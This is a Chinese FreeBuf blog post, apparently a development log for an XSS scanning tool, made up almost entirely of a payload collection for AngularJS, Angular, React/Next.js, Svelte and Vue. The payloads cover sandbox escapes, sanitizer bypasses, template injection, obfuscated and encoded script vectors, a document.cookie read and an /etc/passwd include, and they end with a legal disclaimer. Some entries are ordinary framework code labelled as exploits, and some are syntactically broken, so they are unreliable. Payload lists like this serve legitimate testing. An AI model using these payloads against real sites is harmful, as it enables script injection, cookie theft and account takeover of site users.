官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
HrBeyondXSS开发记录(1)——前端框架payload
Hrlies- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
HrBeyondXSS开发记录(1)——前端框架payload
本文由
Hrlies 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
Angular Payload
angularjs:
# AngularJS 沙箱逃逸技术
sandbox_escape:
- "{{constructor.constructor('alert(1)')()}}"
- "{{ (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value, 'alert(1)' )() }}"
- "{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].__proto__,a).value, 'alert(1)')()}}"
# 危险方法调用
unsafe_methods:
- "$eval('alert(1)')"
- "$evalAsync('alert(1)')"
- "$apply('alert(1)')"
# 过滤器滥用
filter_exploit:
- "{{'a'|orderBy:'alert(1)'}}"
- "{{'a'| filter: 'x=alert(1)'}}"
angular:
# 安全上下文绕过
sanitizer_bypass:
- "bypassSecurityTrustHtml('<img src=x onerror=alert(1)>')"
- "bypassSecurityTrustScript('alert(1)')"
- "bypassSecurityTrustUrl('javascript:alert(1)')"
# 模板注入
template_injection:
- "<div [innerHTML]='${payload}'></div>"
- "<div innerHTML='{{ ${payload} }}'></div>"
- "<script type='text/ng-template'>${payload}</script>"
# Zone.js 相关漏洞
zone_js_exploits:
- "Zone.current.fork({}).run(() => { ${payload} })"
- "NgZone.runOutsideAngular(() => { ${payload} })"
# 服务端渲染 (SSR) 攻击
ssr_attack:
- "</xmp><script>alert(1)</script>"
- "<div>{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1') }}</div>"
# 属性绑定攻击
attribute_binding:
- "<a [attr.href]='${payload}'>click</a>"
- "<img [attr.src]='${payload}'>"
# 事件绑定攻击
event_binding:
- "<button (click)='${payload}'>"
- "<div (mouseover)='${payload}'>"
# 现代漏洞模式 (Angular 12+)
modern_exploits:
- "{{ $any({}).constructor.constructor('alert(1)')() }}"
- "<iframe [srcdoc]='${payload}'></iframe>"
- "<object [data]='${payload}'></object>"
# 依赖注入滥用
dependency_injection:
- "constructor(private sanitizer: DomSanitizer) { sanitizer.bypassSecurityTrustHtml(${payload}) }"
- "@Injectable({ providedIn: 'root' }) class ExploitService { constructor() { ${payload} }"
# 服务端模板注入
ssti:
- "{{ 7 * 7 }}<%= 7 * 7 %>"
- "{{ config.__proto__.ENV = {}; ${payload} }}"
# 编码混淆策略
encoding_strategies:
angular_specific:
# 模板表达式混淆
- "{{ 'a'.constructor.prototype.charAt=[].join; $eval('x=${payload}') }}"
# Unicode 转义
- "\u007B\u007B alert(1) \u007D\u007D" # {{ alert(1) }}
# 字符插入混淆
- "{{ 'a'|orderBy:'al'%2b'ert(1)' }}"
# 混合编码
- "<div [innerHTML]='${payload|base64}'></div>"
# 上下文敏感检测规则
context_rules:
template_expression:
detection_patterns:
- "\\{\\{.*\\}\\}"
- "\\[\\(].*="
injection_points:
- "innerHTML"
- "href"
- "style"
security_sensitive:
dangerous_methods:
- "bypassSecurityTrust"
- "renderer2.createElement"
- "ElementRef.nativeElement"
# 版本特征检测
version_detection:
angularjs_signatures:
- "ng-app"
- "data-ng-"
- "ng-controller"
angular_signatures:
- "platformBrowserDynamic"
- "@Component"
- "CommonModule"
version_patterns:
- "X-Powered-By: Angular"
- /angular\/(\d+\.\d+\.\d+)/
React Payload
react_class:
# 类组件漏洞模式
dangerously_set_innerhtml:
- "{ __html: '<img src=x onerror=${payload}>' }"
- "{ __html: '<svg onload=${payload}>' }"
- "{ __html: '<iframe srcdoc=\"${payload}\">' }"
lifecycle_injection:
- "componentDidMount() { ${payload} }"
- "UNSAFE_componentWillReceiveProps() { ${payload} }"
ref_manipulation:
- "this.myRef.current.innerHTML = ${payload}"
- "ReactDOM.findDOMNode(this).innerHTML = ${payload}"
react_hooks:
# 函数组件 Hooks 利用
useEffect_exploit:
- "useEffect(() => { ${payload} }, [])"
- "useLayoutEffect(() => { ${payload} }, [])"
useRef_dom_injection:
- "const ref = useRef(); ref.current.innerHTML = ${payload}"
- "useImperativeHandle(ref, () => ({ exec: () => ${payload} }))"
state_callback:
- "setState(() => { ${payload} })"
- "useState(() => { ${payload} })"
jsx_injection:
# JSX 表达式注入点
expression_escape:
- "{${payload}}"
- "{JSON.stringify({ data: ${payload} })}"
attribute_injection:
- "style={{ color: ${payload} }}"
- "className={${payload}}"
- "data-payload={${payload}}"
spread_operator:
- "{...${payload}}"
- "<div {...${payload}} />"
nextjs:
# Next.js 特定漏洞
server_components:
- "'use client'; ${payload}"
- "export default function Page() { return (${payload}) }"
getServerSideProps:
- "export async function getServerSideProps() { ${payload} }"
- "export const getStaticProps = () => { ${payload} }"
edge_runtime:
- "export const config = { runtime: 'edge' }; ${payload}"
advanced:
# 高阶绕过技术
prototype_pollution:
- "Object.prototype.innerHTML = ${payload}"
- "this.__proto__.render = () => ${payload}"
jsx_function_exec:
- "{(_ => ${payload})()}"
- "{(() => ${payload})()}"
unicode_smuggling:
- "{\\u0061lert(1)}"
- "{['\\x61\\x6c\\x65\\x72\\x74'](1)}"
jsfuck_encoded:
- "{(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]}"
legacy:
# 旧版本 React 漏洞
string_refs:
- "ref='${payload}'"
- "this.refs.${payload}.innerHTML = ''"
react_create_element:
- "React.createElement('div', { dangerouslySetInnerHTML: { __html: ${payload} }})"
- "ReactDOM.render(${payload}, document.body)"
# 混合攻击向量
polyglot:
hybrid_vectors:
- "');alert(1);('" # 闭合原有表达式
- "${payload} || alert(1)"
- "typeof ${payload} === 'function' && ${payload}()"
Svelte Payload
svelte3:
# 模板注入攻击向量
template_injection:
- "{@html '<img src=x onerror=alert(1)>'}"
- "{@html decodeURIComponent('%3Cscript%3Ealert(1)%3C/script%3E')}"
- "<div>{@html unsafeVariable}</div>"
# 事件处理器利用
event_handlers:
- "on:click={() => alert(1)}"
- "on:mouseover={e => prompt(1)}"
- "on:load={event => new Function('alert(1)')()}"
# 属性绑定绕过
attribute_binding:
- "<a href={javascript:alert(1)}>click</a>"
- "<iframe srcdoc={unescapedHTML}>"
- "<div bind:innerHTML={maliciousContent}></div>"
# 动态组件利用
dynamic_components:
- "<svelte:component this={componentWithXSS}/>"
- "<svelte:window on:keydown={handleKey}/>"
- "<svelte:body on:click={executePayload}/>"
# Store 存储系统利用
store_exploits:
- "$store.subscribe(value => eval(value))"
- "writable('alert(1)').update(v => eval(v))"
- "derived(stores, values => new Function(values))"
svelte4:
# 新版本特性利用
reactivity_bypass:
- "$effect(() => { ${payload} })"
- "$derived(() => { eval(inputValue) })"
- "<script rune> let { pwn = alert(1) } = $props() </script>"
# 服务端渲染 (SSR) 攻击
ssr_vectors:
- "{@html '<%%>'}<!--#include virtual=\"/etc/passwd\"-->"
- "<div data-sveltekit-fetched='javascript:alert(1)'></div>"
- "<svelte:head><!--{ '-->' + payload + '<!--' }--></svelte:head>"
# 编译时特性利用
compile_time:
- "<script context='module'>window.__payload = 'alert(1)'</script>"
- "<!--svelte-ignore a11y-click-events-have-key-events-->"
- "<div on:click={unsafeHandler}></div>"
# 通用绕过技术
common:
# 编码混淆技术
encoded_payloads:
- "JaVaScRiPt:alert(1)"
- "data:text/html;charset=utf-8,<script>parent.alert(1)</script>"
- "javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"
# DOM 破坏技术
dom_manipulation:
- "<script>document.currentScript.parentElement.innerHTML = '<img src=x onerror=alert(1)>'</script>"
- "<svelte:self let:props><script>props.execute()</script></svelte:self>"
# 异步执行技术
async_execution:
- "setTimeout(() => alert(1), 500)"
- "requestIdleCallback(() => { ${payload} })"
- "new SharedWorker('data:application/javascript,alert(1)')"
# 上下文敏感 Payload
context_sensitive:
html_element:
- "<script>console.log`${document.cookie}`</script>"
- "<style>@import url(javascript:alert(1));</style>"
attribute_context:
- "javascript:import('data:text/javascript,alert(1)')"
- "data:text/svelte,<svelte:options accessors/><script>export let pwn=alert(1);</script>"
template_literals:
- "`${alert(1)}`"
- "new Function`alert\\x28document.domain\\x29`"
# 高级混淆技术
advanced_obfuscation:
unicode_smuggling:
- "\u0061\u006c\u0065\u0072\u0074(1)"
- "<\u0073cript>alert(1)</script>"
comment_bypass:
- "<!-- --><script>alert(1)</script><!-- -->"
- "/**/eval/**/(atob('YWxlcnQoMSk='))/**/"
chunked_encoding:
- "<scri%0apt>aler%0at(1)</script>"
- "<svelte%3Acomponent this=window['al'+'ert']/>"
Vue Payload
vue2:
template_injection:
- "{{ _c.escape(_s(${payload})) }}" # 转义函数绕过
- "{{ constructor.constructor('alert(1)')() }}" # 构造器链利用
- "{{ _vm.$options.methods.__proto__.x = ${payload} }}" # 原型污染
directives:
v_html:
- "<div v-html='_c.escape(_s(${payload}))'></div>" # v-html 指令绕过
- "<component :is='${payload}'></component>" # 动态组件注入
v_bind:
- ":href='javascript:alert(1)'" # JavaScript协议绑定
- ":style='{color: ${payload}}'" # CSS注入
event_handlers:
- "@click='${payload}'" # 点击事件注入
- "@mouseover=\"${payload}\"" # 带引号的事件处理
- "v-on:focus='new Function(${payload})'" # 动态函数构造
filter_exploits:
- "{{ 'alert(1)' | filterFunction }}" # 过滤器参数注入
- "{{ _vm.$options.filters.__proto__.x = ${payload} }}" # 过滤器原型污染
ssr:
- "{{#with this}}<script>${payload}</script>{{/with}}" # Mustache 模板注入
- "<% ${payload} %>" # 服务端模板注入
vue3:
composition_api:
setup_script:
- "<script setup>${payload}</script>" # Setup语法糖注入
- "const exploit = () => eval(${payload})" # 箭头函数利用
reactivity:
- "ref(${payload})" # 响应式对象注入
- "window.__vue_app__.config.globalProperties.${payload}" # 全局属性污染
renderer:
- "createRenderer({ patchProp: ${payload} })" # 渲染器函数劫持
- "h('div', { innerHTML: ${payload} })" # VNode注入
modern_features:
suspense:
- "<Suspense><template #default>${payload}</template></Suspense>"
teleport:
- "<Teleport to='body'>${payload}</Teleport>"
ecosystem:
vue_router:
- "router.beforeEach((${payload}) => {})" # 路由守卫注入
- "this.$router.addRoutes([{ component: ${payload} }])"
vuex:
- "store.subscribeAction({ after: ${payload} })" # Action订阅攻击
- "this.$store._modules.root._rawModule.actions = ${payload}"
advanced_obfuscation:
unicode_escape:
- "\\u0061\\u006c\\u0065\\u0072\\u0074(1)" # alert的Unicode转义
- "\\x61\\x6c\\x65\\x72\\x74(1)" # Hex转义
string_concat:
- "aler" + "t(1)"
- "window['al' + 'ert'](1)"
template_literals:
- "alert`1`"
- "window[`al${'ert'}`](1)"
dependency_injection:
provide_inject:
- "provide('xss', ${payload})" # Provide漏洞
- "inject('xss')" # Inject触发
plugin_abuse:
- "app.use({ install: ${payload} })" # 插件安装攻击
- "app.mixin({ created: ${payload} })" # 全局混入
server_side:
nuxt_ssr:
- "<%= ${payload} %>" # Nuxt服务端模板
- "useAsyncData(() => ${payload})" # 异步数据注入
vuepress:
- "{{ $page.${payload} }}" # 主题变量注入
- "<ClientOnly>${payload}</ClientOnly>" # 客户端注入点
defense_evasion:
sanitizer_bypass:
- "{{ decodeURIComponent(${payload}) }}" # 解码函数绕过
- "<div v-html='bypassSanitization(${payload})'></div>"
sandbox_escape:
- "with(this){${payload}}" # with语句逃逸
- "Object.defineProperty(this, 'x', { value: ${payload} })"
最近时间安排比较紧张,整合了各种框架的payload。
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
Hrlies
微信公众号:从生活到技术上的安全
已在FreeBuf发表 13 篇文章
本文为 Hrlies 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HrBeyondXSS开发记录
相关推荐
Hrlies LV.5
微信公众号:从生活到技术上的安全
- 13 文章数
- 10 关注者
Java漏洞在白盒审计中的技巧——反序列化篇(Fastjson)
2025-03-30
Java漏洞在黑盒实战中的技巧——JNDI注入篇
2025-03-30
Java漏洞在黑盒实战中的技巧——反序列化篇
2025-03-27
文章目录